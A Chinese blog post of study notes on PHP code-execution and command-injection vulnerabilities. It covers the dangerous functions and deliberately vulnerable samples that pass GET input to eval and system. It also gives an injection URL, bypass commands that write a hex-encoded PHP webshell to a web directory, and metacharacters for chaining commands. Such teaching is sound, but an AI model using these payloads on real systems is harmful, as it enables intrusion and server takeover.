代码执行和命令执行漏洞小记

最新推荐文章于 2024-05-13 18:37:04 发布
最新推荐文章于 2024-05-13 18:37:04 发布
阅读量2.8k 收藏
点赞数 2
分类专栏: 漏洞分析 文章标签: 1024程序员节
qax
本文链接:https://blog.csdn.net/weixin_44578334/article/details/120941843
版权

代码执行漏洞

由于开发人员编写源码,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造语句提交,并交由服务器端执行。命令注入攻击中WEB服务器没有过滤类似system(),eval(),exec()等函数是该漏洞攻击成功的最主要原因。

代码执行漏洞本质

PHP代码执行漏洞可以将代码注入到应用中,最终到webserver去执行,用了相关函数、却存在可以控制的变量。

代码执行产生的函数

eval()
preg_replace()
create_function()
assert()  
array_map()
call_user_func()/call_user_func_array ()
array_filter()
usort()uasort()

静态函数执行

eval()函数是将输入的字符串当做PHP代码执行
assert()会检查指定的 assertion 并在结果为 FALSE 时采取适当的行动。
实例代码:

<?php
eval('phpinfo();');assert('phpinfo();');
?>

动态函数执行
实例代码:

<?php
$code=$_GET["name"];
eval($code);
?>

命令执行漏洞本质

程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序。当应用需要调用一些外部程序时就会用到一些执行系统命令的函数。

命令执行漏洞危害

继承Web服务器程序的权限,去执行系统命令
继承Web服务器程序的权限,读写文件
反弹shell
控制整个网站
甚至控制整个服务器

命令执行产生的函数

system(args) 有回显
passthru(args)(有回显)
exec(args) (回显最后一行-必须echo输出)
shell_exec(args) (无回显-必须输出)

popen(handle,mode)(无回显)
proc_open(‘cmd’,‘flag’,‘flag’)(无回显)
$process = proc_open(‘dir’,$des,$pipes);
echo stream_get_contents($pipes[1]);
system() 输出并返回最后一行shell结果。
exec() 不输出结果,返回最后一行shell结果,所有结果可以保存到一个返回的数组里面。
passthru() 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。
popen()proc_open() 不会直接返回执行结果,而是返回一个文件指针

(在C语言中用一个指针变量指向一个文件,这个指针称为文件指针。通过文件指针就可对它所指的文件进行各种操作)

实例代码:

<?php
$arg = $_GET['cmd'];
if($arg){
    system("$arg");
}
?>

实例代码:

<?php
$arg = $_GET['cmd'];
if($arg){
    system("ping –c 3 $arg");
}
?>
访问格式:
http://127.0.0.1/m.php?cmd=127.0.0.1|whoami

命令执行的绕过

WINDOWS:用^转义<,即执行echo ^<?php eval($_POST[kang]); ?^> > web可写目录加文件完整名字
LINUX:需要用\来转义<,不过很多php都默认开启gpc(魔术引号magic_quotes_gpc())。可以先用16进制转换一句话再用xxd命令把16进制还原。
echo 3c3f706870206576616c28245f504f53545b6b616e675d293b203f3e|xxd -r -ps > web可写目录加文件完整名字
|:管道符,将一个程序的输出作为另一个程序的输入
>:输出重定向,将程序的输出流输入到某个程序或者文本中
>>追加输出重定向,将输出的内容追加到一个文件的末尾
<:输入重定向,将输入的内容重定向到文件或程序中

可以利用的特殊字符

  1. Windows平台:
    | 直接执行后面的语句 ping 127.0.0.1|whoami
    || 前面出错执行后面的 ,前面为假 ping 2 || whoami
    & 前面的语句为假则直接执行后面的,前面可真可假 ping 127.0.0.1&whoami
    &&前面的语句为假则直接出错,后面的也不执行,前面只能为真 ping 127.0.0.1&&whoami
  2. Linux平台:
    ; 前面的执行完执行后面的 ping 127.0.0.1;whoami
    | 管道符,显示后面的执行结果 ping 127.0.0.1|whoami
    11 当前面的执行出错时执行后面的 ping 1||whoami
    & 前面的语句为假则直接执行后面的,前面可真可假 ping 127.0.0.1&whoami
    &&前面的语句为假则直接出错,后面的也不执行,前面只能真 ping 127.0.0.1&&whoami
    双管道符 || 对一个就执行
QAXteam
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
命令执行代码执行漏洞
weixin_44940180的博客
08-20 340
RCE 应用有时需要调用一些执行系统命令函数,当服务器没有严格过滤用户输入的参数时,就有可能导致用户提交恶意语句被服务器执行,造成命令代码执行漏洞,从而控制后台系统 原因 代码层过滤不严 系统的漏洞造成命令注入 调用的第三方组件存在代码执行漏洞 命令执行 函数 system() 该函数会把执行结果输出,并把输出结果的最后一行作为字符串返回,如果执行失败则返回false shell_exec() 不输出结果,返回执行结果 popen() exec() 不输出结果,返回执行结果的最后
大方法的执行性能与调优过程小记
01-31
例如,把文章所附DEMO的play()方法的内容分别重复拷贝1、2、4、8、16、32次并依次运行,在我的机器(Hotspot_1.6u22/Windows)上得到的play()的执行消耗时间分别是28.43、54.72、106.28、214.41、419.30、1476.40...
iwebsec--代码执行漏洞
追求卓越,技术流~
12-04 1248
代码审计 如果post请求有1,就会执行1的参数 assert()函数和evel()函数类似,能把里面的字符串转化为php代码执行 call_user_func()函数第一个参数是函数,第二个参数是调用的参数 fun=“系统执行函数”,而arg=“系统执行命令” 可以说,如果黑客知道有这个函数那么后果是非常严重的,可以写入任意的语句 和call_user_func一样没太大区别 create_function()函数,func构造的函数,而func构造的函数,而func构造的函数,而code
Web安全:代码执行漏洞 测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
05-26 751
攻击者可以通过构造恶意输入来欺骗应用程序执行恶意代码。这种漏洞通常出现在应用程序使用动态语言(如 PHP、Python、Ruby 等)编写的代码,因为这些语言允许在运行时动态执行代码。攻击者可以通过构造特定的输入来欺骗应用程序执行恶意代码,例如在输入注入恶意代码、利用应用程序漏洞绕过输入验证等.
【网络安全】RCE漏洞讲解、绕过方式及实例介绍
等风来
05-13 1013
4、passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字符串作为OS命令执行,且返回命令执行结果;
命令执行代码执行漏洞原理
Spontaneous_0的博客
03-16 416
命令执行代码执行漏洞原理
远程代码执行漏洞
weixin_47532216的博客
09-04 1123
远程代码执行漏洞
pikachu靶场-RCE
mlws1900的博客
04-25 752
可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
代码·Qt/C++使用小记9
最新发布
07-29
Qt/C++使用小记9【使用UDP创建连接发送消息/传输单个文件】
Sqlite数据库sqlite3命令小记.txt
07-02
### Sqlite数据库sqlite3命令小记 #### 一、引言 SQLite 是一款轻量级的数据库管理系统,它被广泛应用于各种应用场景,特别是在移动设备和嵌入式系统上。SQLite 不仅支持标准的 SQL 语法,还提供了一系列实用的...
phpget_magic_quotes_gpc()函数说明
12-18
get_magic_quotes_gpc函数是一个用来判断是否为用户提供的数据增加斜线了,这个在php.ini配置文件哦,下面我来介绍一下get_magic_quotes_gpc()函数说明. get_magic_quotes_gpc函数介绍 取得 PHP 环境变数 magic_quotes_gpc 的值,属于 PHP 系统功能。 语法: long get_magic_quotes_gpc(void); 返回值: 长整数 本函数取得 PHP 环境配置的变量 magic_quotes_gpc (GPC, Get/Post/Cookie) 值。返回 0 表示关闭本功能;返回 1 表示本功能打开。
命令执行漏洞代码执行漏洞详解 一文了解命令执行漏洞代码执行漏洞
闵行小鱼塘
11-08 2718
本篇总结归纳命令执行漏洞(RCE)和代码执行漏洞
网络安全常见十大漏洞总结(原理、危害、防御)
2301_82242964的博客
04-29 612
CSRF(Cross-Site Request Forgery),文名称:跨站请求伪造 原理:攻击者利用目标用户的身份,执行某些非法的操作 跨站点的请求:请求的来源可以是非本站 请求是伪造的:请求的发出不是用户的本意。**XSS原理:**攻击者在网页嵌入客户端脚本(通常是JavaScript的恶意脚本),当用户使用浏览器加载被嵌入恶意代码的网页时,恶意脚本代码就会在用户的浏览器执行,造成跨站脚本的攻击。DOCTYPE、
代码执行漏洞命令执行漏洞
RMC131的博客
04-03 264
当web程序在调用一些字符串转化为代码函数时,没有考虑用户是否可以控制这个字符串,将造成代码执行漏洞
渗透测试-一文了解命令执行漏洞代码执行漏洞
lza20001103的博客
04-23 1453
渗透测试-一文了解命令执行漏洞代码执行漏洞
命令执行漏洞超详细讲解
qinshuoyang1的博客
08-20 5401
应用有时需要调用一些执行系统命令函数,如PHP的`system`、`exec`、`shell_exec`、`passthru`、`popen`、`proc_popen`等,当用户能控制这些函数的参数时,就可以将恶意系统命令拼接到正常命令,从而造成命令执行攻击,这就是命令执行漏洞
代码执行漏洞总结
u014794539的博客
07-25 1584
代码执行漏洞是把代码注入到Web服务器执行,而命令执行漏洞执行的系统命令代码执行漏洞 有的应用程序提供了一些可以将字符串作为代码执行函数,如果对这些函数控制不严格,就可能被攻击者利用,执行恶意代码 eval函数 eval函数把字符串作为PHP代码执行 eval(string $code) eval实例代码 比如一句话木马 <?php @eval($_POST[1])?> assert函数 assert函数检查一个断言是否为FALSE bool assert(mixed $asse
protobuff使用小记
05-31
Protobuf是一种高效的序列化协议,可以用于数据交换和数据存储。它的主要优势是大小小,速度快,可扩展性强。下面是使用Protobuf的一些小记: 1. 定义消息格式 首先,需要定义消息格式,以便Protobuf可以将数据序列化和反序列化。消息格式定义在.proto文件,使用protobuf语言编写。例如,下面是一个简单的消息格式定义: ``` syntax = "proto3"; message Person { string name = 1; int32 age = 2; } ``` 这个消息格式定义了一个名为Person的消息,包含两个字段:name和age。 2. 生成代码 一旦消息格式定义好,就可以使用Protobuf编译器生成代码。编译器将根据消息格式定义生成相应的代码,包括消息类、序列化和反序列化方法等。可以使用以下命令生成代码: ``` protoc --java_out=. message.proto ``` 这将生成一个名为message.pb.java的Java类,该类包含Person消息的定义以及相关方法。 3. 序列化和反序列化 一旦生成了代码,就可以使用Protobuf序列化和反序列化数据。例如,下面是一个示例代码,将一个Person对象序列化为字节数组,并将其反序列化为另一个Person对象: ``` Person person = Person.newBuilder() .setName("Alice") .setAge(25) .build(); byte[] bytes = person.toByteArray(); Person deserializedPerson = Person.parseFrom(bytes); ``` 这个示例代码创建了一个Person对象,将其序列化为字节数组,然后将其反序列化为另一个Person对象。在这个过程,Protobuf使用生成的代码执行序列化和反序列化操作。 以上是使用Protobuf的一些基本步骤和注意事项,希望对你有所帮助!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QAXteam

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值